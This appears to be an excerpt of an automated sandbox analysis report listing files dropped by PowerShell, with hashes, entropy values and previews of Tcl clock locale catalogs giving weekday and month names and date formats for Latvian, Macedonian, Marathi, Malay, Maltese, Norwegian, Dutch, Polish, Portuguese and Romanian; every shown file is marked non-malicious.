                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \.. "Sv"\.. "P"\.. "O"\.. "T"\.. "C"\.. "Pk"\.. "S"].. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \.. "sv\u0113tdiena"\.. "pirmdiena"\.. "otrdiena"\.. "tre\u0161diena"\.. "ceturdien"\.. "piektdiena"\.. "sestdiena"].. ::msgcat::mcset lv MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maijs"\.. "J\u016bn"\.. "J\u016bl"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset lv MONTHS_FULL [list \.. "janv\u0101ris"\.. "febru\u0101ris"\.. "marts"\.. "apr\u012blis"\.. "maijs"\.. "j\u016bnijs"\.. "j\u016blijs"\.. "augusts"\.. "septembris"\.. "oktobris"\.. "novembris"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2157
                                                                                                                                                                                                                      Entropy (8bit):4.299300188052441
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:4389QMsGqdQfRQPjQmofqJp9sk5BstSpWQiQ3QJQ5QL39I0QRQTQ8Ql4J8W:2W8SMq+9sWINi2Kc9I0+gXF
                                                                                                                                                                                                                      MD5:888014F13A82511ABEF99497A753BFC3
                                                                                                                                                                                                                      SHA1:7F4231BEDE191370B37E8B917B6AD8829D15CA7D
                                                                                                                                                                                                                      SHA-256:4C0EB07F0FCB36DD12A3F7EDD6531616611ABF62BF7705B5A37CC59098221D5D
                                                                                                                                                                                                                      SHA-512:D748127CC615584901D35B6492EC566448B6C4DA6363858B5145921E9CD09490355CF4315F0F7A8542AA12790CD3432011A643A3A8F74B0119DB0DCE19FD68A4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0435\u0434."\.. "\u043f\u043e\u043d."\.. "\u0432\u0442."\.. "\u0441\u0440\u0435."\.. "\u0447\u0435\u0442."\.. "\u043f\u0435\u0442."\.. "\u0441\u0430\u0431."].. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0435\u043b\u0430"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\.. "\u043f\u0435\u0442\u043e\u043a"\.. "\u0441\u0430\u0431\u043e\u0442\u0430"].. ::msgcat::mcset mk MONTHS_ABBREV [list \.. "\u0458\u0430\u043d."\.. "\u0444\u0435\u0432."\.. "\u043c\u0430\u0440."\.. "\u0430\u043f\u0440."\.. "\u043c\u0430\u0458."\.. "\u0458\u0443\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1846
                                                                                                                                                                                                                      Entropy (8bit):4.220147808639664
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR833cXh48Vc7VczfVczPmzNVcYVcR0prdSmS68FezUVcYVcR0prdSmS68FeoV:43K4S+0prjS68Yh0prjS68nV
                                                                                                                                                                                                                      MD5:07F99E0A05083B10F80A4D6867163B23
                                                                                                                                                                                                                      SHA1:B6036C7DA8043E3401583D03831E7A4BF755D93D
                                                                                                                                                                                                                      SHA-256:AE873BF5484EACBBE179913D43451BE53378FA701B5D81594D052266B8A09AF0
                                                                                                                                                                                                                      SHA-512:3A032C81B8FBFEE6EB66C1538CBD16329A1B393E4684B4E9B3FBCDD6344CE8AD34FA699F76EF953B3EB597D8E253345F54C2E92E7A43611C721038BCC2471EA2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset mr MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\u091f\u0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.89440333975705
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoGNv+IZoGU3v6ry/5oGNo+3v+6f6HyFvn:4EnLB383Zvlw3v6ry/ZF3vmSVn
                                                                                                                                                                                                                      MD5:67368E8A5715860BABD44E54A168192F
                                                                                                                                                                                                                      SHA1:7790D4B4B28FE5E38AB11CD037FFB826A8EB77FD
                                                                                                                                                                                                                      SHA-256:B7B1D379355A1D278E13EF557A887A662E84FB6A9B62B8E19A27927926270EF9
                                                                                                                                                                                                                      SHA-512:E95C90CFFA7CC4E61026FC328A4AA0BEE6A54A0061BA0B9459F9F0F4B008DD36F81BC9B8D8B964FA051FCEAB7FECE6D107CD456B3FD01A83B4900ECC3A0BCFA4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):957
                                                                                                                                                                                                                      Entropy (8bit):4.018924167342869
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383Zm/aufodZmt+JHEA7UVRosmAL/7Idzr43xRRosuL1PJHWZ6tHhHjv:4aR83ZsauSHJkA7umE/72UD21PJWZ0hT
                                                                                                                                                                                                                      MD5:7E6A943B7D82404F61BDBD95682073CD
                                                                                                                                                                                                                      SHA1:B96DBB1738F293D2842FDCEDF2DEF13004F77A8D
                                                                                                                                                                                                                      SHA-256:970B2F3ECC04980FCC2F9531CA6CE2BF36BC12942CB614BF70313B4CB0508985
                                                                                                                                                                                                                      SHA-512:12F5A5F7A170EE79D1F4398E96FF2DE84472027C5B5003DE7E86F46713E3F0997439E2EBA03FFB7DB611F0CE0E06EB149F5BD08ED2AA0409DB8348867487FFFD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \.. "Aha"\.. "Isn"\.. "Sei"\.. "Rab"\.. "Kha"\.. "Jum"\.. "Sab"].. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \.. "Ahad"\.. "Isnin"\.. "Selasa"\.. "Rahu"\.. "Khamis"\.. "Jumaat"\.. "Sabtu"].. ::msgcat::mcset ms MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mac"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ogos"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dis"\.. ""].. ::msgcat::mcset ms MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Mac"\.. "April"\.. "Mei"\.. "Jun"\.. "Julai"\.. "Ogos"\.. "September"\.. "Oktober"\.. "November"\.. "Disember"\.. ""]..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):265
                                                                                                                                                                                                                      Entropy (8bit):4.818053174805798
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoChFfluoChF+3v6xyFjoCh++3vflm68vn:4EnLB383xPflwe3v6gZl3vflm6+n
                                                                                                                                                                                                                      MD5:A02F11BE0DF920E63E7A3ACCE746E32D
                                                                                                                                                                                                                      SHA1:4A8B1EF1A6F8A5FD022042D6E009A01E4B0FEBD3
                                                                                                                                                                                                                      SHA-256:F5B859D8DD2A2B5F756E39B0DFEB26B95878D2F54BA3CE46C56F0F26CF2B554B
                                                                                                                                                                                                                      SHA-512:5F9AF8C89F491CB4C158ED73EA4CF32E6A83CF44A94DA6FE1A962C58199BF2348530F3DEFA0C6F433BA3ADEF81AE9B3884F30CD7A841B159D52F9F21008B4F92
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):717
                                                                                                                                                                                                                      Entropy (8bit):4.55153350337982
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                      MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                      SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                      SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                      SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1209
                                                                                                                                                                                                                      Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                      MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                      SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                      SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                      SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1129
                                                                                                                                                                                                                      Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                      MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                      SHA1:1642D8040144469B5C359E80693E68036F87B849
                                                                                                                                                                                                                      SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                      SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                      MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                      SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                      SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                      SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1200
                                                                                                                                                                                                                      Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                      MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                      SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                      SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                      SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                      Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                      MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                      SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                      SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                      SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1177
                                                                                                                                                                                                                      Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                      MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                      SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                      SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                      SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                      MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                      SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                      SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                      SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1224
                                                                                                                                                                                                                      Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                      MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                      SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                      SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                      SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                      Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                      MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                      SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                      SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                      SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                      Malicious:false
